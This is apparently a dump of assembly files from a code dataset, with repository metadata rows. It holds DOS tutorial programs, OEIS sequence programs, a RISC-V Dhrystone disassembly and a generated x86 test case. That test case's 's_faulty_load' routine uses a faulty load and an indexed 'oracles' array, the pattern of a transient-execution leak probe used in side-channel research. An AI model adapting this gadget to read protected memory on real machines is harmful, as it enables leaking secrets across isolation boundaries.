LEA DX, maxTxt
INT 21h
MOV AH, 02h
MOV DL, max
INT 21h
MOV AX ,4C00h
INT 21H
MAIN ENDP
NEWLINE PROC
MOV AH, 09H
LEA DX, nl
INT 21h
RET
NEWLINE ENDP
END MAIN | 15.932584 | 51 | 0.51622 |
cacc1f4544e15d922c40d70fc136ce1ecb90a08b | 403 | asm | Assembly | y2s2/csa/tutorials/t10-code/t10-challenge-1.2-HOT-TOPIC.asm | ouldevloper/university | 4bb4a7e86912b46aa625900d2985b4d1e436cf4e | [
"MIT"
] | 8 | 2019-06-22T14:29:51.000Z | 2021-09-22T16:58:12.000Z | y2s2/csa/tutorials/t10-code/t10-challenge-1.2-HOT-TOPIC.asm | ouldevloper/university | 4bb4a7e86912b46aa625900d2985b4d1e436cf4e | [
"MIT"
] | 1 | 2020-06-30T06:38:00.000Z | 2020-07-08T06:37:57.000Z | y2s2/csa/tutorials/t10-code/t10-challenge-1.2-HOT-TOPIC.asm | ouldevloper/university | 4bb4a7e86912b46aa625900d2985b4d1e436cf4e | [
"MIT"
] | 9 | 2020-04-04T12:59:50.000Z | 2022-03-27T22:44:58.000Z | ; t10-challenge-1.2-HOT-TOPIC.asm
; Write a program to determine the number of positive &
; negative numbers in a list
; The number 0 is used to end the list, which means
; the size of the integer list is not fixed
LIST DB 12, 29, -9, 5, -48, 20
MOV SI, 0
L1:
CMP LIST[SI], 0
JE Display
JG L3
INC CNTN ; > 0
JMP L2
L3: INC CNTP ; <0
L2:
INC SI
JMP L1
Display: | 19.190476 | 55 | 0.620347 |
0498707e6ad5d624792e1501b44510c0382d383e | 1,831 | asm | Assembly | programs/oeis/060/A060787.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/060/A060787.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/060/A060787.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A060787: a(n) = 18*(n-2)*(2*n-5).
; 0,18,108,270,504,810,1188,1638,2160,2754,3420,4158,4968,5850,6804,7830,8928,10098,11340,12654,14040,15498,17028,18630,20304,22050,23868,25758,27720,29754,31860,34038,36288,38610,41004,43470,46008,48618,51300,54054,56880,59778,62748,65790,68904,72090,75348,78678,82080,85554,89100,92718,96408,100170,104004,107910,111888,115938,120060,124254,128520,132858,137268,141750,146304,150930,155628,160398,165240,170154,175140,180198,185328,190530,195804,201150,206568,212058,217620,223254,228960,234738,240588,246510,252504,258570,264708,270918,277200,283554,289980,296478,303048,309690,316404,323190,330048,336978,343980,351054,358200,365418,372708,380070,387504,395010,402588,410238,417960,425754,433620,441558,449568,457650,465804,474030,482328,490698,499140,507654,516240,524898,533628,542430,551304,560250,569268,578358,587520,596754,606060,615438,624888,634410,644004,653670,663408,673218,683100,693054,703080,713178,723348,733590,743904,754290,764748,775278,785880,796554,807300,818118,829008,839970,851004,862110,873288,884538,895860,907254,918720,930258,941868,953550,965304,977130,989028,1000998,1013040,1025154,1037340,1049598,1061928,1074330,1086804,1099350,1111968,1124658,1137420,1150254,1163160,1176138,1189188,1202310,1215504,1228770,1242108,1255518,1269000,1282554,1296180,1309878,1323648,1337490,1351404,1365390,1379448,1393578,1407780,1422054,1436400,1450818,1465308,1479870,1494504,1509210,1523988,1538838,1553760,1568754,1583820,1598958,1614168,1629450,1644804,1660230,1675728,1691298,1706940,1722654,1738440,1754298,1770228,1786230,1802304,1818450,1834668,1850958,1867320,1883754,1900260,1916838,1933488,1950210,1967004,1983870,2000808,2017818,2034900,2052054,2069280,2086578,2103948,2121390,2138904,2156490,2174148,2191878,2209680,2227554
mul $0,2
bin $0,2
mov $1,$0
mul $1,18
| 228.875 | 1,755 | 0.841617 |
8817c8a8c9ba4ed7308f2c7baefc91f904f7692a | 487 | asm | Assembly | oeis/331/A331022.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/331/A331022.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/331/A331022.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A331022: Numbers k such that the number of strict integer partitions of k is a power of 2.
; Submitted by Jon Maiga
; 0,1,2,3,4,6,9,16,20,29,34,45
mov $4,$0
mov $6,$0
lpb $4
mov $0,$6
mov $1,0
sub $4,1
sub $0,$4
mov $2,$0
add $0,1
div $0,2
lpb $0
sub $0,1
mov $3,$2
sub $3,$0
sub $3,1
mov $8,$3
sub $8,$0
mov $7,$8
mov $9,$0
lpb $7
div $2,2
mov $7,$1
div $9,2
lpe
add $1,$9
lpe
add $5,$2
lpe
mov $0,$5
| 14.323529 | 92 | 0.498973 |
a31e83b9f78d041ac2d5533ad3d42e068cf90604 | 259 | asm | Assembly | Linux/addWithoutCarry/addWithoutCarry.asm | shikhar-scs/Assembly-with-MacOS | 6690d5da758d614fd5af452f86ad5153fb7466f0 | [
"Apache-2.0"
] | 19 | 2018-04-20T04:41:23.000Z | 2021-11-14T15:58:24.000Z | Linux/addWithoutCarry/addWithoutCarry.asm | shikhar-scs/Assembly-with-MacOS | 6690d5da758d614fd5af452f86ad5153fb7466f0 | [
"Apache-2.0"
] | 1 | 2018-04-20T02:01:17.000Z | 2018-04-20T11:47:22.000Z | Linux/addWithoutCarry/addWithoutCarry.asm | shikhar-scs/Assembly-with-MacOS | 6690d5da758d614fd5af452f86ad5153fb7466f0 | [
"Apache-2.0"
] | 7 | 2018-04-19T20:05:30.000Z | 2020-06-24T03:12:40.000Z | data SEGMENT
n1 DB 03h
n2 DB 07h
data ENDS
code SEGMENT
assume CS:code, DS:data
start:
MOV AX,data
MOV DS,AX
MOV AL,n1
ADD AL,n2
ADD AL,30h ; decimal to ascii
MOV DL,AL
MOV AH,02h ; character output
INT 21h
MOV AH,4ch ;exit
INT 21h
code ENDS
END start
| 9.592593 | 29 | 0.72973 |
405db914c36ce8ce3246481a9e4d4c0a3d80650a | 5,911 | asm | Assembly | Transynther/x86/_processed/US/_zr_/i3-7100_9_0xca_notsx.log_410_1470.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/US/_zr_/i3-7100_9_0xca_notsx.log_410_1470.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/US/_zr_/i3-7100_9_0xca_notsx.log_410_1470.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r14
push %r9
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x1c230, %rsi
lea addresses_WT_ht+0xcc04, %rdi
nop
nop
nop
nop
nop
cmp $53795, %rax
mov $95, %rcx
rep movsl
nop
cmp $61926, %r9
lea addresses_WC_ht+0x14664, %rsi
lea addresses_WC_ht+0x5fb4, %rdi
nop
nop
nop
nop
nop
add $180, %r9
mov $59, %rcx
rep movsl
nop
nop
nop
nop
sub $11485, %rdi
lea addresses_UC_ht+0xe864, %rsi
lfence
mov (%rsi), %r9
nop
add %r11, %r11
lea addresses_normal_ht+0x17264, %rax
nop
nop
nop
nop
nop
cmp $48479, %r9
movb (%rax), %cl
sub %r9, %r9
lea addresses_normal_ht+0xe434, %rsi
lea addresses_WC_ht+0x9364, %rdi
nop
add $335, %r11
mov $123, %rcx
rep movsb
nop
inc %rdi
lea addresses_normal_ht+0x11664, %r11
cmp $24925, %r14
movb $0x61, (%r11)
nop
nop
nop
nop
nop
add $48737, %rsi
lea addresses_WT_ht+0x6c64, %r9
nop
nop
nop
and $38395, %r14
movb $0x61, (%r9)
nop
nop
nop
nop
inc %rsi
lea addresses_D_ht+0xaa08, %rax
sub $8931, %r9
movl $0x61626364, (%rax)
nop
nop
dec %r11
lea addresses_D_ht+0x9de4, %rsi
nop
nop
add $45801, %rax
mov $0x6162636465666768, %rdi
movq %rdi, %xmm4
movups %xmm4, (%rsi)
nop
nop
nop
nop
nop
sub $50005, %r9
lea addresses_WT_ht+0x15ba4, %rsi
nop
nop
xor $35395, %r14
mov $0x6162636465666768, %rdi
movq %rdi, %xmm2
vmovups %ymm2, (%rsi)
nop
nop
nop
cmp %r9, %r9
lea addresses_normal_ht+0x5864, %rsi
lea addresses_A_ht+0x14aa4, %rdi
add %rax, %rax
mov $96, %rcx
rep movsl
nop
sub $5583, %r14
lea addresses_WT_ht+0x16bb8, %rsi
lea addresses_UC_ht+0x15e64, %rdi
nop
nop
nop
cmp %r11, %r11
mov $3, %rcx
rep movsb
nop
nop
nop
nop
nop
xor $42845, %rdi
lea addresses_A_ht+0x1b664, %r14
nop
nop
nop
nop
inc %r9
movups (%r14), %xmm5
vpextrq $0, %xmm5, %rax
nop
nop
nop
nop
add %r11, %r11
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r9
pop %r14
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r15
push %r8
push %rax
push %rdx
push %rsi
// Store
mov $0x4d8c490000000254, %rsi
nop
nop
nop
nop
nop
add $3625, %rdx
movw $0x5152, (%rsi)
inc %r8
// Store
lea addresses_PSE+0x138f4, %rdx
nop
nop
add %r12, %r12
movb $0x51, (%rdx)
nop
nop
dec %r11
// Faulty Load
lea addresses_US+0xe664, %r8
xor $51894, %rax
mov (%r8), %r12d
lea oracles, %r8
and $0xff, %r12
shlq $12, %r12
mov (%r8,%r12,1), %r12
pop %rsi
pop %rdx
pop %rax
pop %r8
pop %r15
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 4, 'NT': False, 'type': 'addresses_NC', 'size': 2, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 2, 'NT': False, 'type': 'addresses_PSE', 'size': 1, 'AVXalign': False}}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_D_ht', 'congruent': 1, 'same': True}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 4, 'same': False}}
{'src': {'type': 'addresses_WC_ht', 'congruent': 7, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 4, 'same': True}}
{'src': {'same': False, 'congruent': 7, 'NT': True, 'type': 'addresses_UC_ht', 'size': 8, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_normal_ht', 'size': 1, 'AVXalign': True}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 11, 'NT': False, 'type': 'addresses_normal_ht', 'size': 1, 'AVXalign': True}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 8, 'NT': False, 'type': 'addresses_WT_ht', 'size': 1, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': True, 'congruent': 2, 'NT': False, 'type': 'addresses_D_ht', 'size': 4, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 6, 'NT': False, 'type': 'addresses_D_ht', 'size': 16, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 3, 'NT': False, 'type': 'addresses_WT_ht', 'size': 32, 'AVXalign': False}}
{'src': {'type': 'addresses_normal_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 6, 'same': False}}
{'src': {'type': 'addresses_WT_ht', 'congruent': 2, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 11, 'same': False}}
{'src': {'same': False, 'congruent': 11, 'NT': False, 'type': 'addresses_A_ht', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
{'00': 410}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 26.271111 | 1,229 | 0.653527 |
4c1bfc0519dfd21f8bd04042711df508be678c10 | 396 | asm | Assembly | oeis/347/A347365.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/347/A347365.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/347/A347365.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A347365: a(n) = n * (2-(-1)^n), or zero together with first differences of even triangular numbers halved (A074378).
; Submitted by Simon Strandgaard
; 0,3,2,9,4,15,6,21,8,27,10,33,12,39,14,45,16,51,18,57,20,63,22,69,24,75,26,81,28,87,30,93,32,99,34,105,36,111,38,117,40,123,42,129,44,135,46,141,48,147,50,153,52,159,54,165,56,171,58,177,60,183,62,189,64
mov $1,$0
dif $0,2
mul $0,4
sub $0,$1
| 44 | 204 | 0.676768 |
7c7f995995c1d2dd47fe8d79b1d4c6575203deaa | 166,364 | asm | Assembly | src/test/resources/asm/dhrystoneO3C.asm | cbrune/VexRiscv | 4824827b7ed6331acfda1c2b0dd8c9fb7361cb96 | [
"MIT"
] | 1,524 | 2017-03-23T19:56:30.000Z | 2022-03-31T10:23:27.000Z | src/test/resources/asm/dhrystoneO3C.asm | cbrune/VexRiscv | 4824827b7ed6331acfda1c2b0dd8c9fb7361cb96 | [
"MIT"
] | 234 | 2017-08-05T16:39:01.000Z | 2022-03-25T09:57:00.000Z | src/test/resources/asm/dhrystoneO3C.asm | cbrune/VexRiscv | 4824827b7ed6331acfda1c2b0dd8c9fb7361cb96 | [
"MIT"
] | 283 | 2017-03-13T18:59:22.000Z | 2022-03-31T11:19:31.000Z |
build/dhrystone.elf: file format elf32-littleriscv
Disassembly of section .vector:
80000000 <crtStart>:
.global crtStart
.global main
.global irqCallback
crtStart:
j crtInit
80000000: a8ad j 8000007a <crtInit>
nop
80000002: 0001 nop
nop
80000004: 0001 nop
nop
80000006: 0001 nop
nop
80000008: 0001 nop
nop
8000000a: 0001 nop
nop
8000000c: 0001 nop
nop
8000000e: 0001 nop
80000010 <trap_entry>:
.global trap_entry
trap_entry:
sw x1, - 1*4(sp)
80000010: fe112e23 sw ra,-4(sp)
sw x5, - 2*4(sp)
80000014: fe512c23 sw t0,-8(sp)
sw x6, - 3*4(sp)
80000018: fe612a23 sw t1,-12(sp)
sw x7, - 4*4(sp)
8000001c: fe712823 sw t2,-16(sp)
sw x10, - 5*4(sp)
80000020: fea12623 sw a0,-20(sp)
sw x11, - 6*4(sp)
80000024: feb12423 sw a1,-24(sp)
sw x12, - 7*4(sp)
80000028: fec12223 sw a2,-28(sp)
sw x13, - 8*4(sp)
8000002c: fed12023 sw a3,-32(sp)
sw x14, - 9*4(sp)
80000030: fce12e23 sw a4,-36(sp)
sw x15, -10*4(sp)
80000034: fcf12c23 sw a5,-40(sp)
sw x16, -11*4(sp)
80000038: fd012a23 sw a6,-44(sp)
sw x17, -12*4(sp)
8000003c: fd112823 sw a7,-48(sp)
sw x28, -13*4(sp)
80000040: fdc12623 sw t3,-52(sp)
sw x29, -14*4(sp)
80000044: fdd12423 sw t4,-56(sp)
sw x30, -15*4(sp)
80000048: fde12223 sw t5,-60(sp)
sw x31, -16*4(sp)
8000004c: fdf12023 sw t6,-64(sp)
addi sp,sp,-16*4
80000050: 7139 addi sp,sp,-64
call irqCallback
80000052: 28ad jal 800000cc <irqCallback>
lw x1 , 15*4(sp)
80000054: 50f2 lw ra,60(sp)
lw x5, 14*4(sp)
80000056: 52e2 lw t0,56(sp)
lw x6, 13*4(sp)
80000058: 5352 lw t1,52(sp)
lw x7, 12*4(sp)
8000005a: 53c2 lw t2,48(sp)
lw x10, 11*4(sp)
8000005c: 5532 lw a0,44(sp)
lw x11, 10*4(sp)
8000005e: 55a2 lw a1,40(sp)
lw x12, 9*4(sp)
80000060: 5612 lw a2,36(sp)
lw x13, 8*4(sp)
80000062: 5682 lw a3,32(sp)
lw x14, 7*4(sp)
80000064: 4772 lw a4,28(sp)
lw x15, 6*4(sp)
80000066: 47e2 lw a5,24(sp)
lw x16, 5*4(sp)
80000068: 4852 lw a6,20(sp)
lw x17, 4*4(sp)
8000006a: 48c2 lw a7,16(sp)
lw x28, 3*4(sp)
8000006c: 4e32 lw t3,12(sp)
lw x29, 2*4(sp)
8000006e: 4ea2 lw t4,8(sp)
lw x30, 1*4(sp)
80000070: 4f12 lw t5,4(sp)
lw x31, 0*4(sp)
80000072: 4f82 lw t6,0(sp)
addi sp,sp,16*4
80000074: 6121 addi sp,sp,64
mret
80000076: 30200073 mret
8000007a <crtInit>:
crtInit:
.option push
.option norelax
la gp, __global_pointer$
8000007a: 00004197 auipc gp,0x4
8000007e: c2618193 addi gp,gp,-986 # 80003ca0 <__global_pointer$>
.option pop
la sp, _stack_start
80000082: 00006117 auipc sp,0x6
80000086: 44e10113 addi sp,sp,1102 # 800064d0 <_stack_start>
8000008a <bss_init>:
bss_init:
la a0, _bss_start
8000008a: 81c18513 addi a0,gp,-2020 # 800034bc <Dhrystones_Per_Second>
la a1, _bss_end
8000008e: 00006597 auipc a1,0x6
80000092: 03658593 addi a1,a1,54 # 800060c4 <_bss_end>
80000096 <bss_loop>:
bss_loop:
beq a0,a1,bss_done
80000096: 00b50663 beq a0,a1,800000a2 <bss_done>
sw zero,0(a0)
8000009a: 00052023 sw zero,0(a0)
add a0,a0,4
8000009e: 0511 addi a0,a0,4
j bss_loop
800000a0: bfdd j 80000096 <bss_loop>
800000a2 <bss_done>:
bss_done:
ctors_init:
la a0, _ctors_start
800000a2: 00003517 auipc a0,0x3
800000a6: 3fa50513 addi a0,a0,1018 # 8000349c <_ctors_end>
addi sp,sp,-4
800000aa: 1171 addi sp,sp,-4
800000ac <ctors_loop>:
ctors_loop:
la a1, _ctors_end
800000ac: 00003597 auipc a1,0x3
800000b0: 3f058593 addi a1,a1,1008 # 8000349c <_ctors_end>
beq a0,a1,ctors_done
800000b4: 00b50863 beq a0,a1,800000c4 <ctors_done>
lw a3,0(a0)
800000b8: 4114 lw a3,0(a0)
add a0,a0,4
800000ba: 0511 addi a0,a0,4
sw a0,0(sp)
800000bc: c02a sw a0,0(sp)
jalr a3
800000be: 9682 jalr a3
lw a0,0(sp)
800000c0: 4502 lw a0,0(sp)
j ctors_loop
800000c2: b7ed j 800000ac <ctors_loop>
800000c4 <ctors_done>:
ctors_done:
addi sp,sp,4
800000c4: 0111 addi sp,sp,4
//li a0, 0x880 //880 enable timer + external interrupts
//csrw mie,a0
//li a0, 0x1808 //1808 enable interrupts
//csrw mstatus,a0
call main
800000c6: 407020ef jal ra,80002ccc <end>
800000ca <infinitLoop>:
infinitLoop:
j infinitLoop
800000ca: a001 j 800000ca <infinitLoop>
Disassembly of section .memory:
800000cc <irqCallback>:
}
void irqCallback(int irq){
}
800000cc: 8082 ret
800000ce <Proc_2>:
One_Fifty Int_Loc;
Enumeration Enum_Loc;
Int_Loc = *Int_Par_Ref + 10;
do /* executed once */
if (Ch_1_Glob == 'A')
800000ce: 8351c703 lbu a4,-1995(gp) # 800034d5 <Ch_1_Glob>
800000d2: 04100793 li a5,65
800000d6: 00f70363 beq a4,a5,800000dc <Proc_2+0xe>
Int_Loc -= 1;
*Int_Par_Ref = Int_Loc - Int_Glob;
Enum_Loc = Ident_1;
} /* if */
while (Enum_Loc != Ident_1); /* true */
} /* Proc_2 */
800000da: 8082 ret
Int_Loc -= 1;
800000dc: 411c lw a5,0(a0)
*Int_Par_Ref = Int_Loc - Int_Glob;
800000de: 83c1a703 lw a4,-1988(gp) # 800034dc <Int_Glob>
Int_Loc -= 1;
800000e2: 07a5 addi a5,a5,9
*Int_Par_Ref = Int_Loc - Int_Glob;
800000e4: 8f99 sub a5,a5,a4
800000e6: c11c sw a5,0(a0)
} /* Proc_2 */
800000e8: 8082 ret
800000ea <Proc_3>:
/* Ptr_Ref_Par becomes Ptr_Glob */
Rec_Pointer *Ptr_Ref_Par;
{
if (Ptr_Glob != Null)
800000ea: 8441a603 lw a2,-1980(gp) # 800034e4 <Ptr_Glob>
800000ee: c609 beqz a2,800000f8 <Proc_3+0xe>
/* then, executed */
*Ptr_Ref_Par = Ptr_Glob->Ptr_Comp;
800000f0: 4218 lw a4,0(a2)
800000f2: c118 sw a4,0(a0)
800000f4: 8441a603 lw a2,-1980(gp) # 800034e4 <Ptr_Glob>
Proc_7 (10, Int_Glob, &Ptr_Glob->variant.var_1.Int_Comp);
800000f8: 83c1a583 lw a1,-1988(gp) # 800034dc <Int_Glob>
800000fc: 0631 addi a2,a2,12
800000fe: 4529 li a0,10
80000100: 6d80006f j 800007d8 <Proc_7>
80000104 <Proc_1>:
{
80000104: 1141 addi sp,sp,-16
80000106: c04a sw s2,0(sp)
structassign (*Ptr_Val_Par->Ptr_Comp, *Ptr_Glob);
80000108: 8441a783 lw a5,-1980(gp) # 800034e4 <Ptr_Glob>
{
8000010c: c422 sw s0,8(sp)
REG Rec_Pointer Next_Record = Ptr_Val_Par->Ptr_Comp;
8000010e: 4100 lw s0,0(a0)
structassign (*Ptr_Val_Par->Ptr_Comp, *Ptr_Glob);
80000110: 4398 lw a4,0(a5)
{
80000112: c226 sw s1,4(sp)
structassign (*Ptr_Val_Par->Ptr_Comp, *Ptr_Glob);
80000114: 0047ae83 lw t4,4(a5)
80000118: 0087ae03 lw t3,8(a5)
8000011c: 0107a303 lw t1,16(a5)
80000120: 0147a883 lw a7,20(a5)
80000124: 0187a803 lw a6,24(a5)
80000128: 538c lw a1,32(a5)
8000012a: 53d0 lw a2,36(a5)
8000012c: 5794 lw a3,40(a5)
{
8000012e: c606 sw ra,12(sp)
80000130: 84aa mv s1,a0
structassign (*Ptr_Val_Par->Ptr_Comp, *Ptr_Glob);
80000132: 4fc8 lw a0,28(a5)
80000134: 57dc lw a5,44(a5)
80000136: c018 sw a4,0(s0)
Next_Record->Ptr_Comp = Ptr_Val_Par->Ptr_Comp;
80000138: 4098 lw a4,0(s1)
structassign (*Ptr_Val_Par->Ptr_Comp, *Ptr_Glob);
8000013a: cc48 sw a0,28(s0)
8000013c: d45c sw a5,44(s0)
8000013e: 01d42223 sw t4,4(s0)
Ptr_Val_Par->variant.var_1.Int_Comp = 5;
80000142: 4795 li a5,5
structassign (*Ptr_Val_Par->Ptr_Comp, *Ptr_Glob);
80000144: 01c42423 sw t3,8(s0)
80000148: 00642823 sw t1,16(s0)
8000014c: 01142a23 sw a7,20(s0)
80000150: 01042c23 sw a6,24(s0)
80000154: d00c sw a1,32(s0)
80000156: d050 sw a2,36(s0)
80000158: d414 sw a3,40(s0)
Ptr_Val_Par->variant.var_1.Int_Comp = 5;
8000015a: c4dc sw a5,12(s1)
= Ptr_Val_Par->variant.var_1.Int_Comp;
8000015c: c45c sw a5,12(s0)
Next_Record->Ptr_Comp = Ptr_Val_Par->Ptr_Comp;
8000015e: c018 sw a4,0(s0)
Proc_3 (&Next_Record->Ptr_Comp);
80000160: 8522 mv a0,s0
80000162: 3761 jal 800000ea <Proc_3>
if (Next_Record->Discr == Ident_1)
80000164: 405c lw a5,4(s0)
80000166: cfb1 beqz a5,800001c2 <Proc_1+0xbe>
structassign (*Ptr_Val_Par, *Ptr_Val_Par->Ptr_Comp);
80000168: 409c lw a5,0(s1)
} /* Proc_1 */
8000016a: 40b2 lw ra,12(sp)
8000016c: 4422 lw s0,8(sp)
structassign (*Ptr_Val_Par, *Ptr_Val_Par->Ptr_Comp);
8000016e: 0007af83 lw t6,0(a5)
80000172: 0047af03 lw t5,4(a5)
80000176: 0087ae83 lw t4,8(a5)
8000017a: 00c7ae03 lw t3,12(a5)
8000017e: 0107a303 lw t1,16(a5)
80000182: 0147a883 lw a7,20(a5)
80000186: 0187a803 lw a6,24(a5)
8000018a: 4fcc lw a1,28(a5)
8000018c: 5390 lw a2,32(a5)
8000018e: 53d4 lw a3,36(a5)
80000190: 5798 lw a4,40(a5)
80000192: 57dc lw a5,44(a5)
80000194: 01f4a023 sw t6,0(s1)
80000198: 01e4a223 sw t5,4(s1)
8000019c: 01d4a423 sw t4,8(s1)
800001a0: 01c4a623 sw t3,12(s1)
800001a4: 0064a823 sw t1,16(s1)
800001a8: 0114aa23 sw a7,20(s1)
800001ac: 0104ac23 sw a6,24(s1)
800001b0: cccc sw a1,28(s1)
800001b2: d090 sw a2,32(s1)
800001b4: d0d4 sw a3,36(s1)
800001b6: d498 sw a4,40(s1)
800001b8: d4dc sw a5,44(s1)
} /* Proc_1 */
800001ba: 4902 lw s2,0(sp)
800001bc: 4492 lw s1,4(sp)
800001be: 0141 addi sp,sp,16
800001c0: 8082 ret
Proc_6 (Ptr_Val_Par->variant.var_1.Enum_Comp,
800001c2: 4488 lw a0,8(s1)
Next_Record->variant.var_1.Int_Comp = 6;
800001c4: 4799 li a5,6
Proc_6 (Ptr_Val_Par->variant.var_1.Enum_Comp,
800001c6: 00840593 addi a1,s0,8
Next_Record->variant.var_1.Int_Comp = 6;
800001ca: c45c sw a5,12(s0)
Proc_6 (Ptr_Val_Par->variant.var_1.Enum_Comp,
800001cc: 6d0000ef jal ra,8000089c <Proc_6>
Next_Record->Ptr_Comp = Ptr_Glob->Ptr_Comp;
800001d0: 8441a783 lw a5,-1980(gp) # 800034e4 <Ptr_Glob>
Proc_7 (Next_Record->variant.var_1.Int_Comp, 10,
800001d4: 4448 lw a0,12(s0)
800001d6: 00c40613 addi a2,s0,12
Next_Record->Ptr_Comp = Ptr_Glob->Ptr_Comp;
800001da: 439c lw a5,0(a5)
} /* Proc_1 */
800001dc: 40b2 lw ra,12(sp)
800001de: 4492 lw s1,4(sp)
Next_Record->Ptr_Comp = Ptr_Glob->Ptr_Comp;
800001e0: c01c sw a5,0(s0)
} /* Proc_1 */
800001e2: 4422 lw s0,8(sp)
800001e4: 4902 lw s2,0(sp)
Proc_7 (Next_Record->variant.var_1.Int_Comp, 10,
800001e6: 45a9 li a1,10
} /* Proc_1 */
800001e8: 0141 addi sp,sp,16
Proc_7 (Next_Record->variant.var_1.Int_Comp, 10,
800001ea: 5ee0006f j 800007d8 <Proc_7>
800001ee <Proc_4>:
/*******/
/* executed once */
{
Boolean Bool_Loc;
Bool_Loc = Ch_1_Glob == 'A';
800001ee: 8351c783 lbu a5,-1995(gp) # 800034d5 <Ch_1_Glob>
Bool_Glob = Bool_Loc | Bool_Glob;
800001f2: 8381a683 lw a3,-1992(gp) # 800034d8 <Bool_Glob>
Bool_Loc = Ch_1_Glob == 'A';
800001f6: fbf78793 addi a5,a5,-65
800001fa: 0017b793 seqz a5,a5
Bool_Glob = Bool_Loc | Bool_Glob;
800001fe: 8fd5 or a5,a5,a3
80000200: 82f1ac23 sw a5,-1992(gp) # 800034d8 <Bool_Glob>
